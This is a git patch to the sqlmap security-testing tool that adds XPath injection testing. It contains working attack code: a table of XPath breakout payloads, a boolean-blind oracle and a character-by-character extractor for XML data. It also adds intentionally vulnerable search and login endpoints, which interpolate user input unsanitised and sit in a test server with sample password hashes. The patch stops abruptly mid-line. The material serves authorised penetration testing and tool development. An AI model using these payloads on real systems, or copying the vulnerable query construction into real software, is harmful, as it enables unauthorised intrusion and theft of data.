From 8ff5d3811a6ced2f4f487337e28cde8a35f45cd4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Miroslav=20=C5=A0tampar?= Date: Mon, 29 Jun 2026 00:29:27 +0200 Subject: [PATCH] Adding switch --xpath --- .github/workflows/tests.yml | 4 +- data/txt/sha256sums.txt | 17 +- extra/vulnserver/vulnserver.py | 130 +++++++ lib/controller/checks.py | 8 + lib/controller/controller.py | 5 + lib/core/optiondict.py | 2 + lib/core/settings.py | 40 +- lib/core/testing.py | 1 + lib/parse/cmdline.py | 3 + lib/techniques/xpath/__init__.py | 8 + lib/techniques/xpath/inject.py | 626 +++++++++++++++++++++++++++++++ tests/test_xpath.py | 407 ++++++++++++++++++++ 12 files changed, 1242 insertions(+), 9 deletions(-) create mode 100644 lib/techniques/xpath/__init__.py create mode 100644 lib/techniques/xpath/inject.py create mode 100644 tests/test_xpath.py diff --git a/.github/workflows/tests.yml b/.github/workflows/tests.yml index 7f3268e69..fac2dc168 100644 --- a/.github/workflows/tests.yml +++ b/.github/workflows/tests.yml @@ -108,7 +108,9 @@ jobs: python -m coverage report --fail-under=50 - name: Smoke test - run: python sqlmap.py --smoke-test + run: | + python -m pip install -q lxml + python sqlmap.py --smoke-test - name: Vuln test run: python sqlmap.py --vuln-test diff --git a/data/txt/sha256sums.txt b/data/txt/sha256sums.txt index f8337e8c8..b9ca3b144 100644 --- a/data/txt/sha256sums.txt +++ b/data/txt/sha256sums.txt @@ -160,10 +160,10 @@ ca86d61d3349ed2d94a6b164d4648cff9701199b5e32378c3f40fca0f517b128 extra/shutils/ df768bcb9838dc6c46dab9b4a877056cb4742bd6cfaaf438c4a3712c5cc0d264 extra/shutils/recloak.sh 1972990a67caf2d0231eacf60e211acf545d9d0beeb3c145a49ba33d5d491b3f extra/shutils/strip.sh 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 extra/vulnserver/__init__.py -32577fc21a6170266438b608ed81620e0b0a889aa8a05124bc7f0905cba772a6 extra/vulnserver/vulnserver.py +a4d4ec8aaea6da7b20068209945cf46348bde74b4c90ddf630c3be820d16f73e extra/vulnserver/vulnserver.py a2bf70d7f87c3a4e0675c0bad54119a4e04efa6ea2730a8338d5aebcd995630e lib/controller/action.py -c9a1661fc6719655e1e5b6dd72caab680766690c5f746b386093267329f7b3b8 lib/controller/checks.py -256ba0c6967121dc25c95fe09d1165dd8d0530f26c7879e6036f649fb0a6de95 lib/controller/controller.py +0397a941e27fa23ef375b6bd0a654132b05496d78737253a58524aab7e840789 lib/controller/checks.py +e9fd898a38e4e1bfc975e44b41b344c190e58d845b8602a50a2bf05835ddc7c8 lib/controller/controller.py d69e84f1648cdb907f5d2dd454f03874a4613752b07867510145d51d84b3c56f lib/controller/handler.py 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/controller/__init__.py 9c5764c92ce536d1f0f96200359ee5ef1f37f9128769bf990cb77f1d1f8e17b1 lib/core/agent.py @@ -181,7 +181,7 @@ f8de57606325456928e46ae2896f5f8bbec9ad18b1c644b492a566fa992216f6 lib/core/decor 5387168e5dfedd94ae22af7bb255f27d6baaca50b24179c6b98f4f325f5cc7b4 lib/core/exception.py 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/core/__init__.py 914a13ee21fd610a6153a37cbe50830fcbd1324c7ebc1e7fc206d5e598b0f7ad lib/core/log.py -1b03686e1aa916ccad3cd86b8e4e6ea4baca5e30e05bf86a56f8df8dd4f44ba6 lib/core/optiondict.py +8b5d4d1f503ef7075820f7eca184c9e55386b7717c5cf93d195fa9e5332d9e34 lib/core/optiondict.py e033b20a0f7821797a10f4bf4235723f38c7db551c611fbb713faa621b123c4a lib/core/option.py 21b2b1745107c211fc7593923a3da7a808d40763c00091c28de5f7c129bcf3bc lib/core/patch.py 49c0fa7e3814dfda610d665ee02b12df299b28bc0b6773815b4395514ddf8dec lib/core/profiling.py @@ -189,18 +189,18 @@ e033b20a0f7821797a10f4bf4235723f38c7db551c611fbb713faa621b123c4a lib/core/optio 9bf174058f15d14e24e94f9aaf42df045119d3617c6c54bd2f3af79b462f331d lib/core/replication.py 0b8c38a01bb01f843d94a6c5f2075ee47520d0c4aa799cecea9c3e2c5a4a23a6 lib/core/revision.py 888daba83fd4a34e9503fe21f01fef4cc730e5cde871b1d40e15d4cbc847d56c lib/core/session.py -e9aae7dacf83a4d7054862eeb0a96ed695731cd87f8b03836a8a41c7454d0f5f lib/core/settings.py +77a4804887ae9dde7142ede91fcae1bd1d7369132f90d7bf095e8bad6f62e5a4 lib/core/settings.py c7804223319e18eb0b8e2cbf0a8b6896d1cefb7b0b1a2e9f1cf826a8a3b56750 lib/core/shell.py a2e98a94b231432736d6b304fc75525c8b5fdb4768c418387c5b4c1a610dad64 lib/core/subprocessng.py 19f1e3c5e3ba703d28d510cd7a9ab8284d5fbe9df5ce7e77c86e5931571364b7 lib/core/target.py -46b405d0e0e035b3f323deffc1f1d30505adf7c01144ea2ddf81c5dc6caaa20f lib/core/testing.py +fbfb3fa79ac0566a985b8cdc3a2e4758bdf4ccf9d94428163bfe6432c72d696b lib/core/testing.py 95656c44bab1771f4808030dd6a17eae5b129cb1234443f00b19695c7b712b86 lib/core/threads.py b9aacb840310173202f79c2ba125b0243003ee6b44c92eca50424f2bdfc83c02 lib/core/unescaper.py 53e396902cb2546eaa09e77073fcba8be8827ee9ce055cfc899e81b0e6ad4d6d lib/core/update.py 2400e465fa4d13e4c32795910878c71ff212e4361b46428d57ce43983f5e997c lib/core/wordlist.py 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/__init__.py 54bfd31ebded3ffa5848df1c644f196eb704116517c7a3d860b5d081e984d821 lib/parse/banner.py -8351588876a7579fa96b3ab860ef2254487de34ea624c0a7696f2428c24ceb98 lib/parse/cmdline.py +541b517c9cacba2b62122c1dc2be8f2808afdc32e715983edf29998433b531bb lib/parse/cmdline.py 02d82e4069bd98c52755417f8b8e306d79945672656ac24f1a45e7a6eff4b158 lib/parse/configfile.py c5b258be7485089fac9d9cd179960e774fbd85e62836dc67cce76cc028bb6aeb lib/parse/handler.py 5c9a9caee948843d5537745640cc7b98d70a0412cc0949f59d4ebe8b2907c06c lib/parse/headers.py @@ -249,6 +249,8 @@ e2cd2b19f82393f9bbc8f374686cd851a4ccc264bb898ea54547ec479a05674c lib/techniques 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/union/__init__.py ceec65f8cb7c3254c4671351c837418c76ac5bc55ccbc40779f67231b54d7085 lib/techniques/union/test.py c65766f71e285fc85cdf58e7448c4c1d015af2a9dbb44fa3b665a9f13362fbcc lib/techniques/union/use.py +1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/xpath/__init__.py +ece1fca81148ccf3c5f13b6ad7fb64966cb1ebef245216eac5cb0dd2490989db lib/techniques/xpath/inject.py aeefb42ea0c68f72744bc1bfd7194ec1bc06480d8a7e23f4b8d3d23fbba2b014 lib/utils/api.py 442555ab85277aff7c9e0cf465ea5b0d28395c326f68363449b2d3941f4b6de2 lib/utils/brute.py da5bcbcda3f667582adf5db8c1b5d511b469ac61b55d387cec66de35720ed718 lib/utils/crawler.py @@ -654,6 +656,7 @@ eca021208e388b4d14c53f1e9f8a6e7d685e54ba572fb2a8487e6b620a20bcb5 tests/test_use 2364db35025a53ea4e5a0a80c034997642785f7e6d1566d0d0f1db959fe3c82e tests/test_utils.py 93ef9944effc62d4f744c57bd643137c90fd92205c6a6cbe891e0e99efb80a7f tests/test_wafbypass.py 81bb6d7449f224fa337734ae361c1a340bf9a51768a854d6a1a6e718ed1263ca tests/test_wordlist.py +c7584cad4f99416e6415744412941f5a47b2f5284270326624bd291edf6d9994 tests/test_xpath.py 55eaefc664bd8598329d535370612351ec8443c52465f0a37172ea46a97c458a thirdparty/ansistrm/ansistrm.py e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/ansistrm/__init__.py f597b49ef445bfbfb8f98d1f1a08dcfe4810de5769c0abfab7cdce4eebbfcae7 thirdparty/beautifulsoup/beautifulsoup.py diff --git a/extra/vulnserver/vulnserver.py b/extra/vulnserver/vulnserver.py index 99189fbab..ecf7b1920 100644 --- a/extra/vulnserver/vulnserver.py +++ b/extra/vulnserver/vulnserver.py @@ -217,6 +217,84 @@ def nosql_match(params): else: # $eq, $in (single-valued here) and any literal equality return record == value +# --- XPath endpoint (vulnerable search and login, backed by an in-memory XML document) ------------ + +XPATH_XML = """ + + + + luther + Luther Blisset + luther@example.com + db3a16990a0008a3b04707fdef6584a0 + System Administrator + London + +1 555 0100 + + + fluffy + Fluffy Bunny + fluffy@example.com + 4db967ce67b15e7fb84c266a76684729 + Security Engineer + Amsterdam + +1 555 0102 + + + wu + Wu Ming + wu@example.com + f5a2950eaa10f9e99896800eacbe8275 + Network Administrator + Shanghai + +86 21 555 0103 + + + + + linus + Linus Torvalds + linus@example.com + 8e7b6a5c4d321908f7e6d5c4b3a2910f + Kernel Developer + Portland + +1 555 0200 + + + ada + Ada Lovelace + ada@example.com + 1a2b3c4d5e6f7081920a1b2c3d4e5f60 + Algorithm Designer + London + +44 20 555 0201 + + + + + grace + Grace Hopper + grace@example.com + 9e8d7c6b5a493827160e9d8c7b6a5948 + CTO + New York + +1 555 0300 + + +""" + +def _xpath_element_to_dict(el): + """Convert an lxml element to a dict for JSON serialization.""" + retVal = dict(el.attrib) + retVal["tag"] = el.tag + retVal["text"] = (el.text or "").strip() + children = [] + for child in el: + children.append(_xpath_element_to_dict(child)) + if children: + retVal["children"] = children + return retVal + _conn = None _cursor = None _lock = None @@ -889,6 +967,58 @@ class ReqHandler(BaseHTTPRequestHandler): self.wfile.write(output.encode(UNICODE_ENCODING)) return + if self.url == "/xpath/search": + self.send_response(OK) + self.send_header("Content-type", "application/json; charset=%s" % UNICODE_ENCODING) + self.send_header("Connection", "close") + self.end_headers() + + q = self.params.get("q", "") + entries = [] + error = None + + if q: + try: + from lxml import etree + root = etree.fromstring(XPATH_XML.encode("utf-8")) + # VULNERABLE: unsanitized user input directly interpolated into XPath + xpath_expr = "/directory/department/user[contains(username,'%s') or contains(realname,'%s')]" % (q, q) + elements = root.xpath(xpath_expr) + entries = [_xpath_element_to_dict(el) for el in elements] + except Exception as ex: + error = "%s: %s" % (type(ex).__name__, getUnicode(ex)) + + output = json.dumps({"entries": entries, "count": len(entries), "error": error}, default=str) + self.wfile.write(output.encode(UNICODE_ENCODING)) + return + + if self.url == "/xpath/login": + self.send_response(OK) + self.send_header("Content-type", "application/json; charset=%s" % UNICODE_ENCODING) + self.send_header("Connection", "close") + self.end_headers() + + username = self.params.get("username", "") + password = self.params.get("password", "") + error = None + authenticated = False + + if username and password: + try: + from lxml import etree + root = etree.fromstring(XPATH_XML.encode("utf-8")) + # VULNERABLE: unsanitized interpolation into XPath login expression + xpath_expr = "/directory/department/user[username='%s' and password='%s']" % (username, password) + results = root.xpath(xpath_expr) + if results: + authenticated = True + except Exception as ex: + error = "%s: %s" % (type(ex).__name__, getUnicode(ex)) + + output = json.dumps({"authenticated": authenticated, "error": error}, default=str) + self.wfile.write(output.encode(UNICODE_ENCODING)) + return + if self.url == '/': if not any(_ in self.params for _ in ("id", "query")): self.send_response(OK) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index f51d42000..f6a24803d 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -83,6 +83,7 @@ from lib.core.settings import GRAPHQL_ERROR_REGEX from lib.core.settings import HEURISTIC_CHECK_ALPHABET from lib.core.settings import INFERENCE_EQUALS_CHAR from lib.core.settings import LDAP_ERROR_REGEX +from lib.core.settings import XPATH_ERROR_REGEX from lib.core.settings import IPS_WAF_CHECK_PAYLOAD from lib.core.settings import IPS_WAF_CHECK_RATIO from lib.core.settings import IPS_WAF_CHECK_TIMEOUT @@ -1194,6 +1195,13 @@ def heuristicCheckSqlInjection(place, parameter): if conf.beep: beep() + if not conf.xpath and re.search(XPATH_ERROR_REGEX, page or ""): + infoMsg = "heuristic (XPath) test shows that %sparameter '%s' might be vulnerable to XPath injection (rerun with switch '--xpath')" % ("%s " % paramType if paramType != parameter else "", parameter) + logger.info(infoMsg) + + if conf.beep: + beep() + kb.disableHtmlDecoding = False kb.heuristicMode = False diff --git a/lib/controller/controller.py b/lib/controller/controller.py index 2294a66c1..2cffb638c 100644 --- a/lib/controller/controller.py +++ b/lib/controller/controller.py @@ -543,6 +543,11 @@ def start(): ldapScan() continue + if conf.xpath: + from lib.techniques.xpath.inject import xpathScan + xpathScan() + continue + if conf.nullConnection: checkNullConnection() diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py index 42c187c89..edbcd97a0 100644 --- a/lib/core/optiondict.py +++ b/lib/core/optiondict.py @@ -120,6 +120,8 @@ optDict = { "technique": "string", "nosql": "boolean", "graphql": "boolean", + "ldap": "boolean", + "xpath": "boolean", "timeSec": "integer", "uCols": "string", "uChar": "string", diff --git a/lib/core/settings.py b/lib/core/settings.py index f2d89666b..1f3f57508 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -20,7 +20,7 @@ from lib.core.enums import OS from thirdparty import six # sqlmap version (...) -VERSION = "1.10.6.188" +VERSION = "1.10.6.189" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -977,6 +977,44 @@ LDAP_FINGERPRINT_ATTRIBUTES = ( ("vendorName", "Red Hat", "389 Directory Server"), ) +# XPath error signatures per parser implementation for error-based detection and +# fingerprinting (matched against HTTP response bodies). Each tuple is +# (backend_name, regex_fragment). +XPATH_ERROR_SIGNATURES = ( + ("Java JAXP / Xalan", r"(?:javax\.xml\.(?:xpath\.XPathExpressionException|transform\.Transformer(?:Configuration)?Exception)|com\.sun\.org\.apache\.xpath\.(?:XPathException|XPathProcessorException)|org\.apache\.xpath|org\.xml\.sax\.SAX(?:Parse)?Exception)"), + ("Java JAXP / Xalan", r"XPath (?:expression|syntax) error"), + ("Java JAXP / Saxon", r"net\.sf\.saxon\.(?:trans\.XPathException|s9api\.SaxonApiException)"), + ("Java JAXP / Saxon", r"(?:XPST|XPTY|XPDY|XQST|XTDE)\d{4}:"), + (".NET XPathNavigator", r"System\.Xml\.(?:XPath\.XPathException|XmlException)"), + (".NET XPathNavigator", r"Expression must evaluate to a node-set"), + (".NET XPathNavigator", r"has an invalid (?:token|qualified name)"), + ("lxml / libxml2", r"(?:lxml\.etree\.(?:XPath(?:Eval|Document|Syntax)?Error)|libxml2|xmlXPath(?:CompOp|Eval|Err))"), + ("lxml / libxml2", r"(?:XPath error|Invalid (?:expression|predicate))"), + ("PHP SimpleXML / DOMXPath", r"(?:SimpleXMLElement::xpath\(\)|DOMXPath::(?:query|evaluate)\(\))"), + ("PHP SimpleXML / DOMXPath", r"Invalid expression|xmlXPathEval"), + ("Saxon (standalone)", r"(?:net\.sf\.saxon\.(?:s9api\.SaxonApiException|trans\.XPathException)|Saxon error)"), + ("Saxon (standalone)", r"Static error\(s\) in query"), + ("BaseX", r"org\.basex\.(?:query\.QueryException|core\.BaseXException)"), + ("BaseX", r"\[(?:XPST|XPTY|XPDY)\d{4}\]"), + ("eXist", r"org\.exist\.xquery\.(?:XPathException|XQueryException)"), + ("eXist", r"exerr:ERROR"), + ("Python ElementTree", r"xml\.etree\.ElementTree\.(?:ParseError|Element)"), + ("Generic XPath", r"(?:XPath|XSLT).*?(?:error|exception|syntax)"), + ("Generic XPath", r"Invalid XPath|XPath evaluation failed"), +) + +XPATH_ERROR_REGEX = r"(?i)(?:%s)" % '|'.join(regex for _, regex in XPATH_ERROR_SIGNATURES) + +# Printable-ASCII codepoint bounds bisected during XPath blind character extraction +XPATH_CHAR_MIN = 0x20 +XPATH_CHAR_MAX = 0x7e + +# Maximum tree depth for recursive XML walking during XPath blind extraction +XPATH_MAX_DEPTH = 32 + +# Upper bound for the value-length search during XPath blind extraction +XPATH_MAX_LENGTH = 256 + # Length of prefix and suffix used in non-SQLI heuristic checks NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH = 6 diff --git a/lib/core/testing.py b/lib/core/testing.py index 158a218e3..2d8dd5b88 100644 --- a/lib/core/testing.py +++ b/lib/core/testing.py @@ -91,6 +91,7 @@ def vulnTest(): ("-u \"nosql?name=luther&password=x\" -p password --nosql --flush-session", ("is vulnerable to NoSQL injection", "back-end: 'MongoDB'", "NoSQL: GET parameter 'password'", "s3cr3t")), # NoSQL (MongoDB) operator-injection detection + blind regexp extraction ("-u \"graphql\" --graphql --flush-session --disable-hashing", ("found GraphQL endpoint", "introspection returned", "skipping 2 mutation slot", "GraphQL boolean-based blind", "in-band data exposure", "back-end DBMS: 'SQLite'", "banner: '3.", "GraphQL database tables", "fetched 30 entries from table 'creds'", "db3a16990a0008a3b04707fdef6584a0", "GraphQL scan complete")), # GraphQL: endpoint detection + introspection + mutation-skip + boolean-blind/in-band + back-end fingerprint + batched blind dump of an injection-only table (SQLite-backed) ("-u \"ldap/search?q=x\" --ldap --flush-session --disable-hashing", ("is vulnerable to LDAP injection", "Title: LDAP in-band data exposure", "LDAP: GET parameter 'q' in-band entries", "in-band data exposure", "LDAP scan complete")), # LDAP: error-based detection (unbalanced paren) + boolean oracle + directory attribute extraction via blind substring probing + ("-u \"xpath/search?q=x\" --xpath --flush-session --disable-hashing", ("is vulnerable to XPath injection", "Title: XPath boolean-based blind", "XPath: GET parameter 'q' XML tree", "extracted", "XPath scan complete")), # XPath: error-based detection + boolean oracle + blind XML tree-walking via starts-with character extraction ("-u \"&query=*\" --flush-session --technique=Q --banner", ("Title: SQLite inline queries", "banner: '3.")), ("-d \"\" --flush-session --dump -T creds --dump-format=SQLITE --binary-fields=password_hash --where \"user_id=5\"", ("3137396164343563366365326362393763663130323965323132303436653831", "dumped to SQLITE database")), ("-d \"\" --flush-session --banner --schema --sql-query=\"UPDATE users SET name='foobar' WHERE id=4; SELECT * FROM users; SELECT 987654321\"", ("banner: '3.", "INTEGER", "TEXT", "id", "name", "surname", "4,foobar,nameisnull", "'987654321'",)), diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index 72e43e1e6..52929cef7 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -424,6 +424,9 @@ def cmdLineParser(argv=None): techniques.add_argument("--ldap", dest="ldap", action="store_true", help="Test for LDAP injection (filter breakout, boolean blind, auth bypass)") + techniques.add_argument("--xpath", dest="xpath", action="store_true", + help="Test for XPath injection (error-based, boolean-blind, blind XML tree-walking)") + techniques.add_argument("--time-sec", dest="timeSec", type=int, help="Seconds to delay the DBMS response (default %d)" % defaults.timeSec) diff --git a/lib/techniques/xpath/__init__.py b/lib/techniques/xpath/__init__.py new file mode 100644 index 000000000..bcac84163 --- /dev/null +++ b/lib/techniques/xpath/__init__.py @@ -0,0 +1,8 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +pass diff --git a/lib/techniques/xpath/inject.py b/lib/techniques/xpath/inject.py new file mode 100644 index 000000000..32d8e6934 --- /dev/null +++ b/lib/techniques/xpath/inject.py @@ -0,0 +1,626 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import difflib +import re +import time + +from collections import namedtuple + +from lib.core.common import beep +from lib.core.common import randomStr +from lib.core.convert import getUnicode +from lib.core.data import conf +from lib.core.data import logger +from lib.core.enums import CUSTOM_LOGGING +from lib.core.enums import PLACE +from lib.core.settings import UPPER_RATIO_BOUND +from lib.core.settings import XPATH_CHAR_MAX +from lib.core.settings import XPATH_CHAR_MIN +from lib.core.settings import XPATH_ERROR_REGEX +from lib.core.settings import XPATH_ERROR_SIGNATURES +from lib.core.settings import XPATH_MAX_DEPTH +from lib.core.settings import XPATH_MAX_LENGTH +from lib.request.connect import Connect as Request +from lib.utils.xrange import xrange + + +SENTINEL = randomStr(length=10, lowercase=True) + +XPATH_PLACES = (PLACE.GET, PLACE.POST, PLACE.CUSTOM_POST) + +# Each detection breakout is paired with a false variant and an (optional) extraction +# boundary. The boundary carries a prefix/suffix pair that wraps the extraction +# predicate so the surrounding template stays syntactically valid. +# +# Breakouts are listed in detection-priority order: function-argument closers first, +# then simple string, double-quoted, union wildcard, and bare numeric/boolean. + +_BREAKOUT_TABLE = ( + # (breakout, false_variant, extraction_prefix, extraction_suffix ) + # -- function-argument (closes paren + string) ------------------------------------------------------------ + ("') or true() or ('", "') and false() and ('", "') or ", " or ('"), + ("') or '1'='1' or ('", "') and '1'='2' and ('", "') or ", " or ('"), + ("') or 1=1 or ('", "') and 1=2 and ('", "') or ", " or ('"), + # -- single-quoted string (suffix absorbs trailing quote; predicate decisive when original value unmatched) + ("' or '1'='1", "' and '1'='2", "' or ", " and '1'='1"), + ("' or true() or '", "' and false() and '", "' or ", " and '1'='1"), + ("' or 1=1 or '", "' and 1=2 and '", "' or ", " and '1'='1"), + # -- AND context (single-quoted) ------------------------------------------------------------------------- + ("' and '1'='1", "' and '1'='2", "' and ", " and '1'='1"), + # -- double-quoted string (suffix absorbs trailing quote) ------------------------------------------------- + ('" or "1"="1', '" and "1"="2', '" or ', ' and "1"="1'), + ('" or true() or "', '" and false() and "', '" or ', ' and "1"="1'), + # -- double-quoted function-argument --------------------------------------------------------------------- + ('") or true() or ("', '") and false() and ("', '") or ', ' or ("'), + # -- union wildcard (detection-only, no extraction) ------------------------------------------------------ + ("']|//*|test['", None, None, None), + # -- numeric / bare context (extraction uses 'and'; requires original value to not match anything) ---------- + (" or 1=1", " and 1=2", " and ", ""), + (" or true()", " and false()", " and ", ""), +) + +# Boundary: a verified injection boundary with an extraction prefix+suffix and an +# extractable flag. Only extractable boundaries can drive tree-walking. +Boundary = namedtuple("Boundary", ("prefix", "suffix", "extractable")) + +# Convenience lookups built from _BREAKOUT_TABLE +_BREAKOUT_FALSE_MAP = {} +_BREAKOUT_BOUNDARY = {} +_BREAKOUT_LIST = [] +for _entry in _BREAKOUT_TABLE: + _bk, _fv, _pfx, _sfx = _entry + _BREAKOUT_LIST.append(_bk) + _BREAKOUT_FALSE_MAP[_bk] = _fv + if _pfx is not None: + _BREAKOUT_BOUNDARY[_bk] = Boundary(_pfx, _sfx, True) + else: + _BREAKOUT_BOUNDARY[_bk] = None +XPATH_BREAKOUT_PREFIXES = tuple(_BREAKOUT_LIST) + +Slot = namedtuple("Slot", ("place", "parameter", "backend", "oracle", "template", "payload", "boundary")) +Slot.__new__.__defaults__ = (None, None, None, None, None, None, None) + + +def _ratio(first, second): + return difflib.SequenceMatcher(None, first or "", second or "").quick_ratio() + + +def _delim(place): + return (conf.cookieDel or ';') if place == PLACE.COOKIE else '&' + + +def _confParameters(place): + try: + return conf.parameters.get(place, "") + except AttributeError: + return conf.parameters[place] if place in conf.parameters else "" + + +def _originalValue(place, parameter): + for segment in _confParameters(place).split(_delim(place)): + name, _, value = segment.partition('=') + if name.strip() == parameter: + return value + return conf.paramDict.get(place, {}).get(parameter) or "" + + +def _replaceSegment(place, parameter, value): + delimiter = _delim(place) + raw = _confParameters(place) + retVal, replaced = [], False + + for part in raw.split(delimiter): + name, _, _ = part.partition('=') + if not replaced and name.strip() == parameter: + retVal.append("%s=%s" % (name, value)) + replaced = True + else: + retVal.append(part) + + if not replaced: + retVal = [] + for name, oldValue in conf.paramDict.get(place, {}).items(): + retVal.append("%s=%s" % (name, value if name == parameter else oldValue)) + + return delimiter.join(retVal) + + +def _send(place, parameter, value): + """Issue a single HTTP request with the target parameter set to `value`. + Temporarily mutates conf.parameters so sqlmap's normal request machinery + (URL construction, cookies, headers, encodings) is fully preserved.""" + + if conf.delay: + time.sleep(conf.delay) + + old_params = conf.parameters.get(place, "") + conf.parameters[place] = _replaceSegment(place, parameter, value) + + try: + kwargs = {"raise404": False, "silent": True} + if conf.verbose >= 3: + logger.log(CUSTOM_LOGGING.PAYLOAD, "%s=%s" % (parameter, value)) + page, _, _ = Request.getPage(**kwargs) + return page or "" + except Exception as ex: + logger.debug("XPath probe request failed: %s" % getUnicode(ex)) + return "" + finally: + conf.parameters[place] = old_params + + +def _isError(page): + return bool(re.search(XPATH_ERROR_REGEX, getUnicode(page or ""))) + + +def _backendFromError(page): + page = getUnicode(page or "") + for backend, regex in XPATH_ERROR_SIGNATURES: + if re.search(regex, page): + return backend + return "Generic XPath" if _isError(page) else None + + +def _probeBackendByParserError(place, parameter): + """Probe for XPath parser errors to obtain a backend hint. + This is NOT authoritative detection -- only a boolean oracle confirms injection.""" + + original = _originalValue(place, parameter) or "x" + normal = _send(place, parameter, original) + + for suffix in ("'", '"', "')", '")', "]", "|"): + payload = original + suffix + broken = _send(place, parameter, payload) + + if not normal or _ratio(normal, broken) >= UPPER_RATIO_BOUND: + continue + + backend = _backendFromError(broken) + if backend and not _isError(normal): + return backend, payload + + return None, None + + +def _boolean(truthy, falsy): + """Return the reproducible true page when true/false probes diverge. + Both true AND false pages must be independently reproducible.""" + + truePage = truthy() + if truePage is None or _isError(truePage): + return None + + truePage2 = truthy() + if _ratio(truePage, truePage2) < UPPER_RATIO_BOUND: + return None + + falsePage = falsy() + if falsePage is None or _isError(falsePage): + return None + + falsePage2 = falsy() + if _ratio(falsePage, falsePage2) < UPPER_RATIO_BOUND: + return None + + if _ratio(truePage, falsePage) < UPPER_RATIO_BOUND: + return truePage + + return None + + +def _makePayload(original, boundary, predicate): + """Construct a payload by inserting `predicate` into the verified boundary.""" + if boundary.suffix: + return "%s%s%s%s" % (original, boundary.prefix, predicate, boundary.suffix) + return "%s%s%s" % (original, boundary.prefix, predicate) + + +def _detectBoolean(place, parameter): + """Return (template, payload, boundary) for boolean-blind XPath injection. + boundary is None for detection-only breakouts (wildcard, union).""" + + original = _originalValue(place, parameter) or "" + + for breakout in XPATH_BREAKOUT_PREFIXES: + truePayload = original + breakout + falseVariant = _BREAKOUT_FALSE_MAP.get(breakout) + if not falseVariant: + continue + + falseSpecific = original + falseVariant + template = _boolean(lambda p=truePayload: _send(place, parameter, p), + lambda p=falseSpecific: _send(place, parameter, p)) + if template: + boundary = _BREAKOUT_BOUNDARY.get(breakout) + return template, truePayload, boundary + + # Wildcard: only useful for bool differentiation, not enumeration + if original: + template = _boolean(lambda: _send(place, parameter, "*"), + lambda: _send(place, parameter, SENTINEL)) + if template: + return template, "*", None + + return None, None, None + + +def _isPasswordParam(parameter): + parameter = getUnicode(parameter or "").lower() + return any(_ in parameter for _ in ("pass", "pwd", "secret", "pin", "cred", "key", "token", "auth")) + + +def _fingerprintByError(backend): + if not backend: + return None + for name, _ in XPATH_ERROR_SIGNATURES: + if name in backend: + return name + return backend + + +def _xpathQuote(s): + """Quote a string for an XPath string literal, choosing the delimiter that + requires no escaping. When both quotes appear, use concat().""" + + s = getUnicode(s) + if "'" not in s: + return "'%s'" % s + if '"' not in s: + return '"%s"' % s + # both quote types present: use concat() with " as outer delimiter + return "concat(%s)" % ", '\"', ".join('"%s"' % part for part in s.split('"')) + + +class _XPathPayloadBuilder(object): + """Build XPath boolean predicates for blind tree-walking using the verified + injection boundary from detection. Each method returns a complete payload.""" + + def __init__(self, original, boundary): + self.original = original or "x" + self.boundary = boundary + + def _make(self, predicate): + return _makePayload(self.original, self.boundary, predicate) + + def nameStartsWith(self, path, prefix): + return self._make("starts-with(name(%s),%s)" % (path, _xpathQuote(prefix))) + + def nameLength(self, path, length): + return self._make("string-length(name(%s))=%d" % (path, length)) + + def childCount(self, path, count): + return self._make("count(%s/*)>=%d" % (path, count)) + + def attributeCount(self, path, count): + return self._make("count(%s/@*)>=%d" % (path, count)) + + def attributeNameStartsWith(self, path, index, prefix): + return self._make("starts-with(name(%s/@*[%d]),%s)" % (path, index, _xpathQuote(prefix))) + + def attributeValueStartsWith(self, path, index, prefix): + return self._make("starts-with(string(%s/@*[%d]),%s)" % (path, index, _xpathQuote(prefix))) + + def textStartsWith(self, path, prefix): + return self._make("starts-with(string(%s),%s)" % (path, _xpathQuote(prefix))) + + +def _makeOracle(place, parameter, template): + """Build an oracle from a verified true template. extract(payload) returns + True when the response is closer to the true template than to the false page.""" + + cache = {} + + def request(payload): + if payload not in cache: + cache[payload] = _send(place, parameter, payload) + return cache[payload] + + falsePage = request(SENTINEL) + + def oracle(payload): + page = request(payload) + if page is None or _isError(page): + return False + return _ratio(template, page) >= UPPER_RATIO_BOUND + + def extract(payload): + page = request(payload) + if page is None or _isError(page): + return False + trueRatio = _ratio(template, page) + falseRatio = _ratio(falsePage, page) + # Require either an unambiguous match against the template or a + # clear separation from the false page (minimum 5 %pt margin) + return trueRatio >= UPPER_RATIO_BOUND or (trueRatio - falseRatio) > 0.05 + + oracle.extract = extract + oracle.template = template + oracle.falsePage = falsePage + oracle.cache = cache + return oracle + + +# Frequency-ordered charset for blind character extraction. +# Excludes characters that are XPath metacharacters or problematic in URL context. +_META_ORDS = set(ord(_) for _ in ("'", '"', '[', ']', '<', '>', '&', '/')) +_FREQ = (tuple(xrange(ord('a'), ord('z') + 1)) + + tuple(xrange(ord('A'), ord('Z') + 1)) + + tuple(xrange(ord('0'), ord('9') + 1)) + + tuple(ord(_) for _ in "@._-+ ")) +_CHARSET = [] +for _ in _FREQ: + if XPATH_CHAR_MIN <= _ <= 